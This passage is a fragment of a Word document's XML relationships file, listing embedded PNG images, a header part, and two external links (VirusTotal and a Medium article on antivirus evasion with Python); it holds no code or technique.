Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image35.png"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image18.png"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image41.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image33.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image39.png"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.png"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image34.png"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image45.png"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image43.png"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.png"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image22.png"/><Relationship Id="rId51" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId50" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image25.png"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image38.png"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.png"/><Relationship Id="rId55" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image20.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image36.png"/><Relationship Id="rId54" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image48.png"/><Relationship Id="rId57" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.png"/><Relationship Id="rId56" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.virustotal.com/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1" TargetMode="External"/><Relationship Id="rId58" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header1.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image24.png"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.png"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image26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